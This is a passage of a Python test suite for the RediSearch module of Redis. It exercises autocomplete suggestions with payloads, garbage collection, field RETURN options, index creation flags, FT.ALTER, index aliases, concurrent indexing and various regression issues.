env.expect('ft.SUGADD ac olah 1 PAYLOAD').error().contains('Invalid payload: Expected an argument, but none provided')
env.expect('ft.SUGADD ac olah 1 REDIS PAYLOAD payload').error().contains('Unknown argument `REDIS`')
env.expect('ft.SUGGET ac olah FUZZ').error().contains("Unrecognized argument: FUZZ")
query = 'verylongquery'
for _ in range(3):
query += query
env.expect('ft.SUGGET ac', query).error().contains("Invalid query")
env.expect('ft.SUGGET ac', query + query).error().contains("Invalid query length")
def testSuggestPayload(env):
r = env
env.assertEqual(1, r.execute_command(
'ft.SUGADD', 'ac', 'hello world', 1, 'PAYLOAD', 'foo'))
env.assertEqual(2, r.execute_command(
'ft.SUGADD', 'ac', 'hello werld', 1, 'PAYLOAD', 'bar'))
env.assertEqual(3, r.execute_command(
'ft.SUGADD', 'ac', 'hello nopayload', 1, 'PAYLOAD', ''))
env.assertEqual(4, r.execute_command(
'ft.SUGADD', 'ac', 'hello nopayload2', 1))
res = r.execute_command("FT.SUGGET", "ac", "hello", 'WITHPAYLOADS')
env.assertListEqual(['hello world', 'foo', 'hello werld', 'bar', 'hello nopayload', None, 'hello nopayload2', None],
res)
res = r.execute_command("FT.SUGGET", "ac", "hello")
env.assertListEqual(['hello world', 'hello werld', 'hello nopayload', 'hello nopayload2'],
res)
res = r.execute_command(
"FT.SUGGET", "ac", "hello", 'WITHPAYLOADS', 'WITHSCORES')
    # we don't compare the scores because they may change
env.assertEqual(12, len(res))
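# Per-document payloads set at FT.ADD time are only returned when the search asks for WITHPAYLOADS.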
def testPayload(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'f', 'text'))
for i in range(10):
env.assertOk(r.execute_command('ft.add', 'idx', '%d' % i, 1.0,
'payload', 'payload %d' % i,
'fields', 'f', 'hello world'))
for x in r.retry_with_rdb_reload():
res = r.execute_command(
'ft.search', 'idx', 'hello world')
env.assertEqual(21, len(res))
res = r.execute_command(
'ft.search', 'idx', 'hello world', 'withpayloads')
env.assertEqual(31, len(res))
env.assertEqual(10, res[0])
for i in range(1, 30, 3):
env.assertEqual(res[i + 1], 'payload %s' % res[i])
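# After every document is deleted, repeatedly forcing GC invocations should purge the index:
# num_docs and num_records drop to zero and the inverted index shrinks below its initial size.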
def testGarbageCollector(env):
env.skipOnCluster()
if env.moduleArgs is not None and 'GC_POLICY FORK' in env.moduleArgs:
        # this test is not relevant for the fork GC because it does not clean the last block
raise unittest.SkipTest()
N = 100
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'foo', 'text'))
for i in range(N):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0,
'fields', 'foo', ' '.join(('term%d' % random.randrange(0, 10) for i in range(10)))))
def get_stats(r):
res = r.execute_command('ft.info', 'idx')
d = {res[i]: res[i + 1] for i in range(0, len(res), 2)}
gc_stats = {d['gc_stats'][x]: float(
d['gc_stats'][x + 1]) for x in range(0, len(d['gc_stats']), 2)}
d['gc_stats'] = gc_stats
return d
stats = get_stats(r)
if 'current_hz' in stats['gc_stats']:
env.assertGreater(stats['gc_stats']['current_hz'], 8)
env.assertEqual(0, stats['gc_stats']['bytes_collected'])
env.assertGreater(int(stats['num_records']), 0)
initialIndexSize = float(stats['inverted_sz_mb']) * 1024 * 1024
for i in range(N):
env.assertEqual(1, r.execute_command(
'ft.del', 'idx', 'doc%d' % i))
for _ in range(100):
        # the GC is randomized, so invoke it enough times for it to actually clean everything
env.cmd('ft.debug', 'GC_FORCEINVOKE', 'idx')
stats = get_stats(r)
env.assertEqual(0, int(stats['num_docs']))
env.assertEqual(0, int(stats['num_records']))
if not env.is_cluster():
env.assertEqual(100, int(stats['max_doc_id']))
if 'current_hz' in stats['gc_stats']:
env.assertGreater(stats['gc_stats']['current_hz'], 30)
currentIndexSize = float(stats['inverted_sz_mb']) * 1024 * 1024
# print initialIndexSize, currentIndexSize,
# stats['gc_stats']['bytes_collected']
env.assertGreater(initialIndexSize, currentIndexSize)
env.assertGreater(stats['gc_stats'][
'bytes_collected'], currentIndexSize)
for i in range(10):
res = r.execute_command('ft.search', 'idx', 'term%d' % i)
env.assertEqual([0], res)
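# RETURN controls which fields come back with each result: RETURN 0 returns ids only,
# RETURN 1 <field> returns just that field, and a RETURN count that exceeds the remaining
# arguments is an error rather than a crash.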
def testReturning(env):
env.assertCmdOk('ft.create', 'idx', 'schema',
'f1', 'text',
'f2', 'text',
'n1', 'numeric', 'sortable',
'f3', 'text')
for i in range(10):
env.assertCmdOk('ft.add', 'idx', 'DOC_{0}'.format(i), 1.0, 'fields',
'f2', 'val2', 'f1', 'val1', 'f3', 'val3',
'n1', i)
# RETURN 0. Simplest case
for x in env.retry_with_reload():
res = env.cmd('ft.search', 'idx', 'val*', 'return', '0')
env.assertEqual(11, len(res))
env.assertEqual(10, res[0])
for r in res[1:]:
env.assertTrue(r.startswith('DOC_'))
for field in ('f1', 'f2', 'f3', 'n1'):
res = env.cmd('ft.search', 'idx', 'val*', 'return', 1, field)
env.assertEqual(21, len(res))
env.assertEqual(10, res[0])
for pair in grouper(res[1:], 2):
docname, fields = pair
env.assertEqual(2, len(fields))
env.assertEqual(field, fields[0])
env.assertTrue(docname.startswith('DOC_'))
# Test that we don't return SORTBY fields if they weren't specified
# also in RETURN
res = env.cmd('ft.search', 'idx', 'val*', 'return', 1, 'f1',
'sortby', 'n1', 'ASC')
row = res[2]
# get the first result
env.assertEqual(['f1', 'val1'], row)
# Test when field is not found
res = env.cmd('ft.search', 'idx', 'val*', 'return', 1, 'nonexist')
env.assertEqual(21, len(res))
env.assertEqual(10, res[0])
        # Test that we don't crash if we're given the wrong number of fields
with env.assertResponseError():
res = env.cmd('ft.search', 'idx', 'val*', 'return', 700, 'nonexist')
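# Helper for testCreationOptions: create an index with the given creation flags
# (NOOFFSETS / NOFIELDS / NOFREQS) and verify that frequency-based ranking and
# field filtering behave accordingly.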
def _test_create_options_real(env, *options):
options = [x for x in options if x]
has_offsets = 'NOOFFSETS' not in options
has_fields = 'NOFIELDS' not in options
has_freqs = 'NOFREQS' not in options
try:
env.cmd('ft.drop', 'idx')
except:
pass
options = ['idx'] + options + ['schema', 'f1', 'text', 'f2', 'text']
env.assertCmdOk('ft.create', *options)
for i in range(10):
env.assertCmdOk('ft.add', 'idx', 'doc{}'.format(
i), 0.5, 'fields', 'f1', 'value for {}'.format(i))
# Query
# res = env.cmd('ft.search', 'idx', "value for 3")
# if not has_offsets:
# env.assertIsNone(res)
# else:
# env.assertIsNotNone(res)
# Frequencies:
env.assertCmdOk('ft.add', 'idx', 'doc100',
1.0, 'fields', 'f1', 'foo bar')
env.assertCmdOk('ft.add', 'idx', 'doc200', 1.0,
'fields', 'f1', ('foo ' * 10) + ' bar')
res = env.cmd('ft.search', 'idx', 'foo')
env.assertEqual(2, res[0])
if has_offsets:
docname = res[1]
if has_freqs:
env.assertEqual('doc200', docname)
else:
env.assertEqual('doc100', docname)
env.assertCmdOk('ft.add', 'idx', 'doc300',
1.0, 'fields', 'f1', 'Hello')
res = env.cmd('ft.search', 'idx', '@f2:Hello')
if has_fields:
env.assertEqual(1, len(res))
else:
env.assertEqual(3, len(res))
def testCreationOptions(env):
from itertools import combinations
for x in range(1, 5):
for combo in combinations(('NOOFFSETS', 'NOFREQS', 'NOFIELDS', ''), x):
_test_create_options_real(env, *combo)
env.expect('ft.create', 'idx').error()
def testInfoCommand(env):
from itertools import combinations
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'NOFIELDS', 'schema', 'title', 'text'))
N = 50
for i in xrange(N):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1, 'replace', 'fields',
'title', 'hello term%d' % i))
for _ in r.retry_with_rdb_reload():
res = r.execute_command('ft.info', 'idx')
d = {res[i]: res[i + 1] for i in range(0, len(res), 2)}
env.assertEqual(d['index_name'], 'idx')
env.assertEqual(d['index_options'], ['NOFIELDS'])
env.assertListEqual(
d['fields'], [['title', 'type', 'TEXT', 'WEIGHT', '1']])
if not env.is_cluster():
env.assertEquals(int(d['num_docs']), N)
env.assertEquals(int(d['num_terms']), N + 1)
env.assertEquals(int(d['max_doc_id']), N)
env.assertEquals(int(d['records_per_doc_avg']), 2)
env.assertEquals(int(d['num_records']), N * 2)
env.assertGreater(float(d['offset_vectors_sz_mb']), 0)
env.assertGreater(float(d['key_table_size_mb']), 0)
env.assertGreater(float(d['inverted_sz_mb']), 0)
env.assertGreater(float(d['bytes_per_record_avg']), 0)
env.assertGreater(float(d['doc_table_size_mb']), 0)
for x in range(1, 5):
for combo in combinations(('NOOFFSETS', 'NOFREQS', 'NOFIELDS', ''), x):
combo = list(filter(None, combo))
options = combo + ['schema', 'f1', 'text']
try:
env.cmd('ft.drop', 'idx')
except:
pass
env.assertCmdOk('ft.create', 'idx', *options)
info = env.cmd('ft.info', 'idx')
ix = info.index('index_options')
env.assertFalse(ix == -1)
opts = info[ix + 1]
# make sure that an empty opts string returns no options in
# info
if not combo:
env.assertListEqual([], opts)
for option in filter(None, combo):
env.assertTrue(option in opts)
def testNoStem(env):
env.cmd('ft.create', 'idx', 'schema', 'body',
'text', 'name', 'text', 'nostem')
if not env.isCluster():
        # todo: make this check generic enough to also pass on a cluster
res = env.cmd('ft.info', 'idx')
env.assertEqual(res[5][1][5], 'NOSTEM')
for _ in env.retry_with_reload():
try:
env.cmd('ft.del', 'idx', 'doc')
except redis.ResponseError:
pass
# Insert a document
env.assertCmdOk('ft.add', 'idx', 'doc', 1.0, 'fields',
'body', "located",
'name', "located")
# Now search for the fields
res_body = env.cmd('ft.search', 'idx', '@body:location')
res_name = env.cmd('ft.search', 'idx', '@name:location')
env.assertEqual(0, res_name[0])
env.assertEqual(1, res_body[0])
def testSearchNonexistField(env):
# GH Issue 133
env.cmd('ft.create', 'idx', 'schema', 'title', 'text',
'weight', 5.0, 'body', 'text', 'url', 'text')
env.cmd('ft.add', 'idx', 'd1', 1.0, 'nosave', 'fields', 'title',
'hello world', 'body', 'lorem dipsum', 'place', '-77.0366 38.8977')
env.cmd('ft.search', 'idx', 'Foo', 'GEOFILTER',
'place', '-77.0366', '38.8977', '1', 'km')
def testSortbyMissingField(env):
# GH Issue 131
env.cmd('ft.create', 'ix', 'schema', 'txt',
'text', 'num', 'numeric', 'sortable')
env.cmd('ft.add', 'ix', 'doc1', 1.0, 'fields', 'txt', 'foo')
env.cmd('ft.search', 'ix', 'foo', 'sortby', 'num')
def testParallelIndexing(env):
# GH Issue 207
env.cmd('ft.create', 'idx', 'schema', 'txt', 'text')
from threading import Thread
env.getConnection()
ndocs = 100
def runner(tid):
cli = env.getConnection()
for num in range(ndocs):
cli.execute_command('ft.add', 'idx', 'doc{}_{}'.format(tid, num), 1.0,
'fields', 'txt', 'hello world' * 20)
ths = []
for tid in range(10):
ths.append(Thread(target=runner, args=(tid,)))
[th.start() for th in ths]
[th.join() for th in ths]
res = env.cmd('ft.info', 'idx')
d = {res[i]: res[i + 1] for i in range(0, len(res), 2)}
env.assertEqual(1000, int(d['num_docs']))
def testDoubleAdd(env):
# Tests issue #210
env.cmd('ft.create', 'idx', 'schema', 'txt', 'text')
env.cmd('ft.add', 'idx', 'doc1', 1.0, 'fields', 'txt', 'hello world')
with env.assertResponseError():
env.cmd('ft.add', 'idx', 'doc1', 1.0,
'fields', 'txt', 'goodbye world')
env.assertEqual('hello world', env.cmd('ft.get', 'idx', 'doc1')[1])
env.assertEqual(0, env.cmd('ft.search', 'idx', 'goodbye')[0])
env.assertEqual(1, env.cmd('ft.search', 'idx', 'hello')[0])
# Now with replace
env.cmd('ft.add', 'idx', 'doc1', 1.0, 'replace',
'fields', 'txt', 'goodbye world')
env.assertEqual(1, env.cmd('ft.search', 'idx', 'goodbye')[0])
env.assertEqual(0, env.cmd('ft.search', 'idx', 'hello')[0])
env.assertEqual('goodbye world', env.cmd('ft.get', 'idx', 'doc1')[1])
def testConcurrentErrors(env):
from multiprocessing import Process
import random
env.cmd('ft.create', 'idx', 'schema', 'txt', 'text')
docs_per_thread = 100
num_threads = 50
docIds = ['doc{}'.format(x) for x in range(docs_per_thread)]
def thrfn():
myIds = docIds[::]
random.shuffle(myIds)
cli = env.getConnection()
with cli.pipeline(transaction=False) as pl:
for x in myIds:
pl.execute_command('ft.add', 'idx', x, 1.0,
'fields', 'txt', ' hello world ' * 50)
try:
pl.execute()
except Exception as e:
pass
# print e
thrs = [Process(target=thrfn) for x in range(num_threads)]
[th.start() for th in thrs]
[th.join() for th in thrs]
res = env.cmd('ft.info', 'idx')
d = {res[i]: res[i + 1] for i in range(0, len(res), 2)}
env.assertEqual(100, int(d['num_docs']))
def testBinaryKeys(env):
env.cmd('ft.create', 'idx', 'schema', 'txt', 'text')
# Insert a document
env.cmd('ft.add', 'idx', 'Hello', 1.0, 'fields', 'txt', 'NoBin match')
env.cmd('ft.add', 'idx', 'Hello\x00World', 1.0, 'fields', 'txt', 'Bin match')
for _ in env.reloading_iterator():
exp = [2L, 'Hello\x00World', ['txt', 'Bin match'], 'Hello', ['txt', 'NoBin match']]
res = env.cmd('ft.search', 'idx', 'match')
env.assertEqual(exp, res)
def testNonDefaultDb(env):
if env.is_cluster():
raise unittest.SkipTest()
# Should be ok
env.cmd('FT.CREATE', 'idx1', 'schema', 'txt', 'text')
try:
env.cmd('SELECT 1')
except redis.ResponseError:
return
# Should fail
with env.assertResponseError():
env.cmd('FT.CREATE', 'idx2', 'schema', 'txt', 'text')
def testDuplicateNonspecFields(env):
env.cmd('FT.CREATE', 'idx', 'schema', 'txt', 'text')
env.cmd('FT.ADD', 'idx', 'doc', 1.0, 'fields',
'f1', 'f1val', 'f1', 'f1val2', 'F1', 'f1Val3')
res = env.cmd('ft.get', 'idx', 'doc')
res = {res[i]: res[i + 1] for i in range(0, len(res), 2)}
env.assertTrue(res['f1'] in ('f1val', 'f1val2'))
env.assertEqual('f1Val3', res['F1'])
def testDuplicateFields(env):
env.cmd('FT.CREATE', 'idx', 'SCHEMA', 'txt',
'TEXT', 'num', 'NUMERIC', 'SORTABLE')
for _ in env.retry_with_reload():
# Ensure the index assignment is correct after an rdb load
with env.assertResponseError():
env.cmd('FT.ADD', 'idx', 'doc', 1.0, 'FIELDS',
'txt', 'foo', 'txt', 'bar', 'txt', 'baz')
# Try add hash
env.hmset('newDoc', {'txt': 'foo', 'Txt': 'bar', 'txT': 'baz'})
# Get the actual value:
from redis import ResponseError
if not env.is_cluster():
with env.assertResponseError(contained='twice'):
env.cmd('FT.ADDHASH', 'idx', 'newDoc', 1.0)
# Try with REPLACE
with env.assertResponseError():
env.cmd('FT.ADD', 'idx', 'doc2', 1.0, 'REPLACE', 'FIELDS',
'txt', 'foo', 'txt', 'bar')
# With replace partial
env.cmd('FT.ADD', 'idx', 'doc2', 1.0, 'REPLACE',
'PARTIAL', 'FIELDS', 'num', 42)
with env.assertResponseError():
env.cmd('FT.ADD', 'idx', 'doc2', 1.0, 'REPLACE',
'PARTIAL', 'FIELDS', 'num', 42, 'num', 32)
def testDuplicateSpec(env):
with env.assertResponseError():
env.cmd('FT.CREATE', 'idx', 'SCHEMA', 'f1',
'text', 'n1', 'numeric', 'f1', 'text')
def testSortbyMissingFieldSparse(env):
# Note, the document needs to have one present sortable field in
# order for the indexer to give it a sort vector
env.cmd('ft.create', 'idx', 'SCHEMA', 'lastName', 'text',
'SORTABLE', 'firstName', 'text', 'SORTABLE')
env.cmd('ft.add', 'idx', 'doc1', 1.0, 'fields', 'lastName', 'mark')
res = env.cmd('ft.search', 'idx', 'mark', 'WITHSORTKEYS', "SORTBY",
"firstName", "ASC", "limit", 0, 100)
# commented because we don't filter out exclusive sortby fields
# env.assertEqual([1L, 'doc1', None, ['lastName', 'mark']], res)
def testLuaAndMulti(env):
if env.is_cluster():
raise unittest.SkipTest()
# Ensure we can work in Lua and Multi environments without crashing
env.cmd('FT.CREATE', 'idx', 'SCHEMA', 'f1', 'text', 'n1', 'numeric')
env.cmd('HMSET', 'hashDoc', 'f1', 'v1', 'n1', 4)
env.cmd('HMSET', 'hashDoc2', 'f1', 'v1', 'n1', 5)
r = env.getConnection()
r.eval("return redis.call('ft.add', 'idx', 'doc1', 1.0, 'fields', 'f1', 'bar')", "0")
r.eval("return redis.call('ft.addhash', 'idx', 'hashDoc', 1.0)", 0)
# Try in a pipeline:
with r.pipeline(transaction=True) as pl:
pl.execute_command('ft.add', 'idx', 'doc2',
1.0, 'fields', 'f1', 'v3')
pl.execute_command('ft.add', 'idx', 'doc3',
1.0, 'fields', 'f1', 'v4')
pl.execute_command('ft.addhash', 'idx', 'hashdoc2', 1.0)
pl.execute()
def testLanguageField(env):
env.cmd('FT.CREATE', 'idx', 'SCHEMA', 'language', 'TEXT')
env.cmd('FT.ADD', 'idx', 'doc1', 1.0,
'FIELDS', 'language', 'gibberish')
res = env.cmd('FT.SEARCH', 'idx', 'gibberish')
env.assertEqual([1L, 'doc1', ['language', 'gibberish']], res)
# The only way I can verify that LANGUAGE is parsed twice is ensuring we
# provide a wrong language. This is much easier to test than trying to
# figure out how a given word is stemmed
with env.assertResponseError():
env.cmd('FT.ADD', 'idx', 'doc1', 1.0, 'LANGUAGE',
'blah', 'FIELDS', 'language', 'gibber')
def testUninitSortvector(env):
# This would previously crash
env.cmd('FT.CREATE', 'idx', 'SCHEMA', 'f1', 'TEXT')
for x in range(2000):
env.cmd('FT.ADD', 'idx', 'doc{}'.format(
x), 1.0, 'FIELDS', 'f1', 'HELLO')
env.broadcast('SAVE')
for x in range(10):
env.broadcast('DEBUG RELOAD')
def normalize_row(row):
return to_dict(row)
def assertAggrowsEqual(env, exp, got):
env.assertEqual(exp[0], got[0])
env.assertEqual(len(exp), len(got))
# and now, it's just free form:
exp = sorted(to_dict(x) for x in exp[1:])
got = sorted(to_dict(x) for x in got[1:])
env.assertEqual(exp, got)
def assertResultsEqual(env, exp, got, inorder=True):
from pprint import pprint
# pprint(exp)
# pprint(got)
env.assertEqual(exp[0], got[0])
env.assertEqual(len(exp), len(got))
exp = list(grouper(exp[1:], 2))
got = list(grouper(got[1:], 2))
for x in range(len(exp)):
exp_did, exp_fields = exp[x]
got_did, got_fields = got[x]
env.assertEqual(exp_did, got_did, message="at position {}".format(x))
got_fields = to_dict(got_fields)
exp_fields = to_dict(exp_fields)
env.assertEqual(exp_fields, got_fields, message="at position {}".format(x))
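# FT.ALTER ... SCHEMA ADD extends an existing index with new TEXT / SORTABLE / NUMERIC fields;
# documents indexed before the change are not reindexed on the new fields.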
def testAlterIndex(env):
env.cmd('FT.CREATE', 'idx', 'SCHEMA', 'f1', 'TEXT')
env.cmd('FT.ADD', 'idx', 'doc1', 1.0, 'FIELDS', 'f1', 'hello', 'f2', 'world')
env.cmd('FT.ALTER', 'idx', 'SCHEMA', 'ADD', 'f2', 'TEXT')
env.cmd('FT.ADD', 'idx', 'doc2', 1.0, 'FIELDS', 'f1', 'hello', 'f2', 'world')
for _ in env.retry_with_reload():
ret = env.cmd('FT.SEARCH', 'idx', 'world')
env.assertEqual([1, 'doc2', ['f1', 'hello', 'f2', 'world']], ret)
env.cmd('FT.ALTER', 'idx', 'SCHEMA', 'ADD', 'f3', 'TEXT', 'SORTABLE')
for x in range(10):
env.cmd('FT.ADD', 'idx', 'doc{}'.format(x + 3), 1.0,
'FIELDS', 'f1', 'hello', 'f3', 'val{}'.format(x))
for _ in env.retry_with_reload():
# Test that sortable works
res = env.cmd('FT.SEARCH', 'idx', 'hello', 'SORTBY', 'f3', 'DESC')
exp = [12, 'doc12', ['f1', 'hello', 'f3', 'val9'], 'doc11', ['f1', 'hello', 'f3', 'val8'], 'doc10', ['f1', 'hello', 'f3', 'val7'], 'doc9', ['f1', 'hello', 'f3', 'val6'], 'doc8', ['f1', 'hello', 'f3', 'val5'], 'doc7', [
'f1', 'hello', 'f3', 'val4'], 'doc6', ['f1', 'hello', 'f3', 'val3'], 'doc5', ['f1', 'hello', 'f3', 'val2'], 'doc4', ['f1', 'hello', 'f3', 'val1'], 'doc3', ['f1', 'hello', 'f3', 'val0']]
assertResultsEqual(env, exp, res)
# Test that we can add a numeric field
env.cmd('FT.ALTER', 'idx', 'SCHEMA', 'ADD', 'n1', 'NUMERIC')
env.cmd('FT.ADD', 'idx', 'docN1', 1.0, 'FIELDS', 'n1', 50)
env.cmd('FT.ADD', 'idx', 'docN2', 1.0, 'FIELDS', 'n1', 250)
for _ in env.retry_with_reload():
res = env.cmd('FT.SEARCH', 'idx', '@n1:[0 100]')
env.assertEqual([1, 'docN1', ['n1', '50']], res)
env.expect('FT.ALTER', 'idx', 'SCHEMA', 'NOT_ADD', 'f2', 'TEXT').error()
env.expect('FT.ALTER', 'idx', 'SCHEMA', 'ADD').error()
env.expect('FT.ALTER', 'idx', 'SCHEMA', 'ADD', 'f2').error()
def testAlterValidation(env):
    # Test the constraints of the ALTER command
env.cmd('FT.CREATE', 'idx1', 'SCHEMA', 'f0', 'TEXT')
for x in range(1, 32):
env.cmd('FT.ALTER', 'idx1', 'SCHEMA', 'ADD', 'f{}'.format(x), 'TEXT')
# OK for now.
    # The next added text field should be one too many
env.assertRaises(redis.ResponseError, env.cmd, 'FT.ALTER',
'idx1', 'SCHEMA', 'ADD', 'tooBig', 'TEXT')
env.cmd('FT.CREATE', 'idx2', 'MAXTEXTFIELDS', 'SCHEMA', 'f0', 'TEXT')
# print env.cmd('FT.INFO', 'idx2')
for x in range(1, 50):
env.cmd('FT.ALTER', 'idx2', 'SCHEMA', 'ADD', 'f{}'.format(x + 1), 'TEXT')
env.cmd('FT.ADD', 'idx2', 'doc1', 1.0, 'FIELDS', 'f50', 'hello')
for _ in env.retry_with_reload():
ret = env.cmd('FT.SEARCH', 'idx2', '@f50:hello')
env.assertEqual([1, 'doc1', ['f50', 'hello']], ret)
env.cmd('FT.CREATE', 'idx3', 'SCHEMA', 'f0', 'text')
# Try to alter the index with garbage
env.assertRaises(redis.ResponseError, env.cmd, 'FT.ALTER', 'idx3',
'SCHEMA', 'ADD', 'f1', 'TEXT', 'f2', 'garbage')
ret = to_dict(env.cmd('ft.info', 'idx3'))
env.assertEqual(1, len(ret['fields']))
env.assertRaises(redis.ResponseError, env.cmd, 'FT.ALTER',
'nonExist', 'SCHEMA', 'ADD', 'f1', 'TEXT')
# test with no fields!
env.assertRaises(redis.ResponseError, env.cmd, 'FT.ALTER', 'idx2', 'SCHEMA', 'ADD')
def testIssue366_1(env):
if env.is_cluster():
raise unittest.SkipTest('ADDHASH unsupported!')
# Test random RDB regressions, see GH 366
env.cmd('FT.CREATE', 'idx1', 'SCHEMA', 'textfield', 'TEXT', 'numfield', 'NUMERIC')
env.hmset('foo', {'textfield': 'blah', 'numfield': 1})
env.cmd('FT.ADDHASH', 'idx1', 'foo', 1, 'replace')
env.cmd('FT.DEL', 'idx1', 'foo')
for _ in env.retry_with_reload():
        pass  # just ensure it doesn't crash
def testIssue366_2(env):
# FT.CREATE atest SCHEMA textfield TEXT numfield NUMERIC
# FT.ADD atest anId 1 PAYLOAD '{"hello":"world"}' FIELDS textfield sometext numfield 1234
# FT.ADD atest anId 1 PAYLOAD '{"hello":"world2"}' REPLACE PARTIAL FIELDS numfield 1111
# shutdown
env.cmd('FT.CREATE', 'idx1', 'SCHEMA', 'textfield', 'TEXT', 'numfield', 'NUMERIC')
env.cmd('FT.ADD', 'idx1', 'doc1', 1, 'PAYLOAD', '{"hello":"world"}',
'FIELDS', 'textfield', 'sometext', 'numfield', 1234)
env.cmd('ft.add', 'idx1', 'doc1', 1,
'PAYLOAD', '{"hello":"world2"}',
'REPLACE', 'PARTIAL',
'FIELDS', 'textfield', 'sometext', 'numfield', 1111)
for _ in env.retry_with_reload():
        pass  # just ensure it doesn't crash
def testIssue654(env):
# Crashes during FILTER
env.cmd('ft.create', 'idx', 'schema', 'id', 'numeric')
env.cmd('ft.add', 'idx', 1, 1, 'fields', 'id', 1)
env.cmd('ft.add', 'idx', 2, 1, 'fields', 'id', 2)
res = env.cmd('ft.search', 'idx', '*', 'filter', '@version', 0, 2)
def testReplaceReload(env):
env.cmd('FT.CREATE', 'idx2', 'SCHEMA', 'textfield', 'TEXT', 'numfield', 'NUMERIC')
# Create a document and then replace it.
env.cmd('FT.ADD', 'idx2', 'doc2', 1.0, 'FIELDS', 'textfield', 's1', 'numfield', 99)
env.cmd('FT.ADD', 'idx2', 'doc2', 1.0, 'REPLACE', 'PARTIAL',
'FIELDS', 'textfield', 's100', 'numfield', 990)
env.dump_and_reload()
# RDB Should still be fine
env.cmd('FT.ADD', 'idx2', 'doc2', 1.0, 'REPLACE', 'PARTIAL',
'FIELDS', 'textfield', 's200', 'numfield', 1090)
doc = to_dict(env.cmd('FT.GET', 'idx2', 'doc2'))
env.assertEqual('s200', doc['textfield'])
env.assertEqual('1090', doc['numfield'])
# command = 'FT.CREATE idx SCHEMA '
# for i in range(255):
# command += 't%d NUMERIC SORTABLE ' % i
# command = command[:-1]
# r.execute_command(command)
# r.execute_command('save')
# // reload from ...
# r.execute_command('FT.ADD idx doc1 1.0 FIELDS t0 1')
def testIssue417(env):
command = ['ft.create', 'idx', 'schema']
for x in range(255):
command += ['t{}'.format(x), 'numeric', 'sortable']
command = command[:-1]
env.cmd(*command)
for _ in env.reloading_iterator():
try:
env.execute_command('FT.ADD', 'idx', 'doc1', '1.0', 'FIELDS', 't0', '1')
except redis.ResponseError as e:
env.assertTrue('already' in e.message.lower())
# >FT.CREATE myIdx SCHEMA title TEXT WEIGHT 5.0 body TEXT url TEXT
# >FT.ADD myIdx doc1 1.0 FIELDS title "hello world" body "lorem ipsum" url "www.google.com"
# >FT.SEARCH myIdx "no-as"
# Could not connect to Redis at 127.0.0.1:6379: Connection refused
# >FT.SEARCH myIdx "no-as"
# (error) Unknown Index name
def testIssue422(env):
env.cmd('ft.create', 'myIdx', 'schema',
'title', 'TEXT', 'WEIGHT', '5.0',
'body', 'TEXT',
'url', 'TEXT')
env.cmd('ft.add', 'myIdx', 'doc1', '1.0', 'FIELDS', 'title', 'hello world', 'bod', 'lorem ipsum', 'url', 'www.google.com')
rv = env.cmd('ft.search', 'myIdx', 'no-as')
env.assertEqual([0], rv)
def testIssue446(env):
env.cmd('ft.create', 'myIdx', 'schema',
'title', 'TEXT', 'SORTABLE')
env.cmd('ft.add', 'myIdx', 'doc1', '1.0', 'fields', 'title', 'hello world', 'body', 'lorem ipsum', 'url', '"www.google.com')
rv = env.cmd('ft.search', 'myIdx', 'hello', 'limit', '0', '0')
env.assertEqual([1], rv)
# Related - issue 635
env.cmd('ft.add', 'myIdx', 'doc2', '1.0', 'fields', 'title', 'hello')
rv = env.cmd('ft.search', 'myIdx', 'hello', 'limit', '0', '0')
env.assertEqual([2], rv)
def testTimeoutSettings(env):
env.cmd('ft.create', 'idx', 'schema', 't1', 'text')
env.expect('ft.search', 'idx', '*', 'ON_TIMEOUT', 'BLAHBLAH').raiseError()
env.expect('ft.search', 'idx', '*', 'ON_TIMEOUT', 'RETURN').notRaiseError()
env.expect('ft.search', 'idx', '*', 'ON_TIMEOUT', 'FAIL').notRaiseError()
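# Index aliases: FT.ALIASADD / FT.ALIASUPDATE / FT.ALIASDEL let any FT.* command address an
# index through an alternative name; an alias cannot point to another alias.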
def testAlias(env):
env.cmd('ft.create', 'idx', 'schema', 't1', 'text')
env.cmd('ft.create', 'idx2', 'schema', 't1', 'text')
env.expect('ft.aliasAdd', 'myIndex').raiseError()
env.expect('ft.aliasupdate', 'fake_alias', 'imaginary_alias', 'Too_many_args').raiseError()
env.cmd('ft.aliasAdd', 'myIndex', 'idx')
env.cmd('ft.add', 'myIndex', 'doc1', 1.0, 'fields', 't1', 'hello')
r = env.cmd('ft.search', 'idx', 'hello')
env.assertEqual([1, 'doc1', ['t1', 'hello']], r)
r2 = env.cmd('ft.search', 'myIndex', 'hello')
env.assertEqual(r, r2)
# try to add the same alias again; should be an error
env.expect('ft.aliasAdd', 'myIndex', 'idx2').raiseError()
env.expect('ft.aliasAdd', 'alias2', 'idx').notRaiseError()
# now delete the index
env.cmd('ft.drop', 'myIndex')
# index list should be cleared now. This can be tested by trying to alias
    # the old alias to a different index
env.cmd('ft.aliasAdd', 'myIndex', 'idx2')
env.cmd('ft.aliasAdd', 'alias2', 'idx2')
env.cmd('ft.add', 'myIndex', 'doc2', 1.0, 'fields', 't1', 'hello')
r = env.cmd('ft.search', 'alias2', 'hello')
env.assertEqual([1L, 'doc2', ['t1', 'hello']], r)
# check that aliasing one alias to another returns an error. This will
# end up being confusing
env.expect('ft.aliasAdd', 'alias3', 'myIndex').raiseError()
# check that deleting the alias works as expected
env.expect('ft.aliasDel', 'myIndex').notRaiseError()
env.expect('ft.search', 'myIndex', 'foo').raiseError()
# create a new index and see if we can use the old name
env.cmd('ft.create', 'idx3', 'schema', 't1', 'text')
env.cmd('ft.add', 'idx3', 'doc3', 1.0, 'fields', 't1', 'foo')
env.cmd('ft.aliasAdd', 'myIndex', 'idx3')
# also, check that this works in rdb save
for _ in env.retry_with_rdb_reload():
r = env.cmd('ft.search', 'myIndex', 'foo')
env.assertEqual([1L, 'doc3', ['t1', 'foo']], r)
# Check that we can move an alias from one index to another
env.cmd('ft.aliasUpdate', 'myIndex', 'idx2')
r = env.cmd('ft.search', 'myIndex', "hello")
env.assertEqual([1L, 'doc2', ['t1', 'hello']], r)
# Test that things like ft.get, ft.aggregate, etc. work
r = env.cmd('ft.get', 'myIndex', 'doc2')
env.assertEqual(['t1', 'hello'], r)
r = env.cmd('ft.aggregate', 'myIndex', 'hello', 'LOAD', '1', '@t1')
env.assertEqual([1, ['t1', 'hello']], r)
# Test update
env.expect('ft.aliasAdd', 'updateIndex', 'idx3')
